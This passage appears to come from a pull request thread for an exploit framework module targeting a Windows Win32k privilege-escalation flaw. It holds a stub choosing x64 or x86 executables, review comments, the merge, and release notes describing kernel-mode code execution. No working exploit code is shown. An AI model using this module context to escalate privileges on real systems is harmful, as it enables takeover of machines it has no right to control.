    if my_target =~ /x64/
      # use the x64 executable
    else
      # use the x86 executable
    end

```

2018-10-16 07:12 UTC, RootUp commented
WFM! tested against windows x64 and x86.
@space-r7 @bcoles hope we are good to land kindly suggest!

2018-10-16 15:10 UTC, space-r7 approved these changes

2018-10-18 03:34 UTC, wchen-r7 commented
Shelby is out for the week. I'll take a look at this PR :-)

2018-10-18 19:43 UTC, merged

2018-10-18 20:03 UTC, wchen-r7 commented
# Release Notes

An elevation of privilege vulnerability exists in Windows when the Win32k component fails to
properly handle objects in memory. An attacker who successfully exploited this vulnerability 
could run arbitrary code in kernel mode. An attacker could then install programs; view, 
change, or delete data; or create new accounts with full user rights.